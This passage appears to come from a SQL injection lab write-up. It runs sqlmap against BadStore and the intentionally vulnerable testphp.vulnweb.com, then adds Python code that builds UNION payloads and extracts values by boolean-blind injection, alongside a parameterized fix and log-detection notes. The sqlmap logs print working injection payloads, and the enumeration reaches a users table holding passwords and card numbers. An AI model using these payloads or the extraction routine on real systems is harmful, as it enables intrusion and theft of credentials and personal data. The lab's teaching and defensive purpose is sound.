[10:29:00] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as


session file
[10:29:00] [INFO] resuming injection data from session file
[10:29:00] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:29:00] [INFO] resuming brute forced table name 'itemdb' from session file
[10:29:00] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: searchquery
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1
18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5
8))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---

[10:29:00] [INFO] the back-end DBMS is MySQL

web application technology: Apache 1.3.28


back-end DBMS: MySQL 4
[10:29:00] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.
0
do you want to use common columns existance check? [Y/n/q] y
[10:29:03] [INFO] checking column existence using items from 'C:\sqlmap-0.9\sqlm
ap\txt\common-columns.txt'
please enter number of threads? [Enter for 1 (current)]
[10:29:05] [WARNING] running in a single-thread mode. This could take a while.
[10:29:36] [INFO] retrieved: price
[10:29:55] [INFO] retrieved: qty

Database: badstoredb
Table: itemdb
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| price  | numeric |
| qty    | numeric |
+--------+---------+

[10:34:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:34:18
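The injection point in the summaries above is a UNION query, and the odd-looking CHAR() calls are how sqlmap wraps the value it wants between two marker strings without sending a single quote, then finds that value in the returned HTML. The Python below is an added example (not part of the original lab and not sqlmap's own code) that decodes the payload shown on this page, rebuilds one in the same shape for a chosen column, and pulls the marked value out of a response. The HTML response is constructed here, not captured from BadStore.

```python
import re

# Payload copied from the sqlmap injection-point summary for BadStore above.
SQLMAP_PAYLOAD = (
    "hi' UNION ALL SELECT NULL, NULL, NULL, "
    "CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),"
    "CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh"
)

# Constructed response: what the search page might render when the fourth
# UNION column lands inside a table cell (not a real BadStore capture).
SAMPLE_RESPONSE = """<html><body><table>
<tr><td>:vtr:badstoredb:rem:</td><td></td><td></td><td></td></tr>
</table></body></html>"""

_CHAR_CALL = re.compile(r"CHAR\(\s*([\d\s,]+?)\s*\)")


def decode_char_calls(sql: str) -> str:
    """Rewrite every MySQL CHAR(n,n,...) call as the single-quoted string it
    builds, so a payload (e.g. one pulled from a web server log) reads plainly.
    The payload above decodes to CONCAT(':vtr:','eoalyzxAog',':rem:'): a start
    marker, a random probe string, and an end marker."""
    def _one(m):
        text = "".join(chr(int(n)) for n in m.group(1).split(","))
        return "'" + text.replace("'", "''") + "'"
    return _CHAR_CALL.sub(_one, sql)


def to_char(text: str) -> str:
    """Encode a string as CHAR(...), the trick that keeps quotes out of the payload."""
    return "CHAR(" + ",".join(str(ord(c)) for c in text) + ")"


def build_union_payload(prefix, n_columns, target_column, expression, start, end):
    """Build a payload in the shape sqlmap used above:
    `prefix' UNION ALL SELECT NULL,...,CONCAT(start, expression, end),...#`.
    target_column is 1-based; every other column is NULL. The trailing '#'
    comments out whatever the application appends to the query (MySQL syntax)."""
    if not 1 <= target_column <= n_columns:
        raise ValueError("target_column out of range")
    cols = ["NULL"] * n_columns
    cols[target_column - 1] = "CONCAT(%s,%s,%s)" % (to_char(start), expression, to_char(end))
    return "%s' UNION ALL SELECT %s#" % (prefix, ",".join(cols))


def extract_marked_value(html, start, end):
    """Return the text between the two markers in the page body, or None when
    the injected column was not rendered (wrong column count or position)."""
    m = re.search(re.escape(start) + r"(.*?)" + re.escape(end), html, re.S)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(decode_char_calls(SQLMAP_PAYLOAD))
    print(build_union_payload("hi", 4, 4, "database()", ":vtr:", ":rem:"))
    print(extract_marked_value(SAMPLE_RESPONSE, ":vtr:", ":rem:"))
```

The markers matter for detection as well as exploitation: a request whose query string contains `UNION ALL SELECT NULL` or several `CHAR(` calls in a row is a strong signature in access logs, and `decode_char_calls` turns such an entry back into readable SQL.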


E) Remaining databases

As we have seen, there is no table called users or anything similar; only the products table was found, so this way we cannot extract users or passwords. Bear in mind that on MySQL 4 there is no information_schema, so sqlmap could only test names taken from its common-tables.txt and common-columns.txt wordlists: a table or column whose name is not in those lists would not have been found. Let us then check the other databases:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:36:17

[10:36:17] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:36:17] [INFO] resuming injection data from session file
[10:36:17] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:36:17] [INFO] resuming brute forced table name 'itemdb' from session file
[10:36:17] [INFO] resuming brute forced column name 'price' for table 'itemdb' from session file
[10:36:17] [INFO] resuming brute forced column name 'qty' for table 'itemdb' from session file
[10:36:17] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: searchquery
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1
18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5
8))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---

[10:36:18] [INFO] the back-end DBMS is MySQL

web application technology: Apache 1.3.28


back-end DBMS: MySQL 4
[10:36:18] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[10:36:18] [INFO] fetching database names
[10:36:18] [INFO] fetching number of databases
[10:36:18] [ERROR] unable to retrieve the number of databases
[10:36:18] [INFO] falling back to current database
[10:36:18] [INFO] fetching current database
[10:36:18] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\ses
sion': badstoredb
available databases [1]:
[*] badstoredb
[10:36:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\
output\192.168.13.164'

[*] shutting down at: 10:36:18


4. Acunetix

We open the site and, after browsing around it a little, we notice in the categories section that the URL carries ?cat=1, which is a hint worth checking.

http://testphp.vulnweb.com/listproducts.php?cat=1

We go to sqlmap and try with:

A) DB server and version
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9 - automatic SQL injection and database takeover tool


http://sqlmap.sourceforge.net

[*] starting at: 10:52:48

[10:52:49] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[10:52:49] [INFO] testing connection to the target url
[10:52:49] [INFO] testing if the url is stable, wait a few seconds
[10:52:50] [INFO] url is stable
[10:52:50] [INFO] testing if GET parameter 'cat' is dynamic
[10:52:50] [INFO] confirming that GET parameter 'cat' is dynamic
[10:52:51] [INFO] GET parameter 'cat' is dynamic
[10:52:51] [INFO] heuristic test shows that GET parameter 'cat' might be injecta
ble (possible DBMS: MySQL)
[10:52:51] [INFO] testing sql injection on GET parameter 'cat'
[10:52:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[10:52:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[10:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:52:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
[10:53:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N]
n
sqlmap identified the following injection points with a total of 29 HTTP(s) requ
ests:
---
Place: GET
Parameter: cat
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 4423=4423

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat=1 AND SLEEP(5)
---

[10:54:07] [INFO] the back-end DBMS is MySQL


web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake
)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[10:54:07] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\
output\testphp.vulnweb.com'

[*] shutting down at: 10:54:07

The cat parameter is vulnerable


B) DB name
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db

sqlmap/0.9 - automatic SQL injection and database takeover tool


http://sqlmap.sourceforge.net

[*] starting at: 11:52:15

[11:52:15] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:52:15] [INFO] resuming injection data from session file
[11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:15] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: cat
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 4423=4423

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat=1 AND SLEEP(5)
---

[11:52:16] [INFO] the back-end DBMS is MySQL


web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake
)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:52:16] [INFO] fetching current database
[11:52:18] [INFO] retrieved: acuart
current database: 'acuart'

[11:52:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com'

[*] shutting down at: 11:52:18


C) Tables
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables -D acuart

sqlmap/0.9 - automatic SQL injection and database takeover tool


http://sqlmap.sourceforge.net

[*] starting at: 11:54:12

[11:54:12] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:54:12] [INFO] resuming injection data from session file
[11:54:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:54:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: cat
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 4423=4423

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat=1 AND SLEEP(5)
---

[11:54:14] [INFO] the back-end DBMS is MySQL


web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake
)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:54:14] [INFO] fetching tables for database 'acuart'
[11:54:14] [INFO] the SQL query used returns 7 entries
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: artists
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: carts
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: categ
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: featured
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: guestbook
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: pictures
[11:54:18] [INFO] retrieved: acuart
[11:54:18] [INFO] retrieved: users
Database: acuart
[7 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| users |
+-----------+


D) Columns
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -T users -D acuart

sqlmap/0.9 - automatic SQL injection and database takeover tool


http://sqlmap.sourceforge.net

[*] starting at: 11:56:55

[11:56:55] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:56:55] [INFO] resuming injection data from session file
[11:56:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:55] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: cat
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 4423=4423

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat=1 AND SLEEP(5)
---

[11:56:56] [INFO] the back-end DBMS is MySQL


web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake
)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:56:56] [INFO] fetching columns for table 'users' on database 'acuart'
[11:56:56] [INFO] the SQL query used returns 8 entries
[11:56:56] [INFO] retrieved: uname
[11:56:56] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: pass
[11:56:57] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: cc
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: address
[11:56:58] [INFO] retrieved: mediumtext
[11:56:58] [INFO] retrieved: email
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: name
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: phone
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: cart
[11:56:59] [INFO] retrieved: varchar(100)
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+
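The enumeration above stops at the column list of acuart.users. The boolean-based blind injection found in step A (cat=1 AND 4423=4423 renders the products, a false condition renders none) is on its own enough to read a value from that table one character at a time, which is what sqlmap falls back to when no UNION or error-based channel is available. The Python below is an added example, not part of the original lab: it builds an in-memory SQLite stand-in for the categ and users tables (table and column names from the page, row contents invented here), assumes listproducts.php concatenates cat into its query as the payload implies, shows that vulnerable handler next to a validated, parameterized one, and extracts users.pass through the same true/false oracle.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the acuart schema: names from the page, rows invented."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE categ (cat_id INTEGER, cname TEXT);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO categ VALUES (1, 'Posters'), (2, 'Paintings');
        INSERT INTO users VALUES ('test', 's3cret');
    """)
    return db


def list_products_vulnerable(db, cat):
    """How a ?cat=1 handler becomes injectable: the raw parameter is concatenated
    into the SQL text, so 'cat=1 AND 4423=4423' is executed as SQL, not as a value."""
    return [r[0] for r in db.execute("SELECT cname FROM categ WHERE cat_id = " + cat)]


def list_products_fixed(db, cat):
    """Hardened form: validate the type first, then bind the value as a parameter
    so the database never parses attacker-controlled text as SQL."""
    if not (cat.isascii() and cat.isdigit()):
        raise ValueError("cat must be a non-negative integer")
    return [r[0] for r in db.execute("SELECT cname FROM categ WHERE cat_id = ?", (int(cat),))]


def fixed_rejects(db, cat):
    """True when the hardened handler refuses the input."""
    try:
        list_products_fixed(db, cat)
    except ValueError:
        return True
    return False


def page_shows_products(db, condition):
    """The oracle a boolean-based blind attack relies on: does the page still list
    products when 'AND (<condition>)' is appended to cat=1?"""
    return bool(list_products_vulnerable(db, "1 AND (" + condition + ")"))


def blind_extract(db, subquery, max_len=64):
    """Recover the string returned by `subquery` one character at a time with a
    binary search over ASCII code points: 7 yes/no requests per character, plus
    one per position to detect the end of the value. SQLite's unicode(), substr()
    and length() stand in for MySQL's ORD(), MID() and LENGTH()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not page_shows_products(db, "length((%s)) >= %d" % (subquery, pos)):
            break  # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            cond = "unicode(substr((%s), %d, 1)) >= %d" % (subquery, pos, mid)
            if page_shows_products(db, cond):
                lo = mid
            else:
                hi = mid - 1
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print(list_products_vulnerable(db, "1 AND 4423=4423"))   # same page as cat=1
    print(list_products_vulnerable(db, "1 AND 4423=4424"))   # empty page
    print(fixed_rejects(db, "1 AND 4423=4423"))              # hardened handler refuses it
    print(blind_extract(db, "SELECT pass FROM users LIMIT 1"))
```

The cost of the blind channel is visible in the request count: about eight requests per character, against a single request for the UNION payload used on BadStore. That is also why a time-based variant (the SLEEP(5) payload above) is so slow, and why a burst of near-identical requests differing only in a numeric comparison is a good thing to alert on in web server logs.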
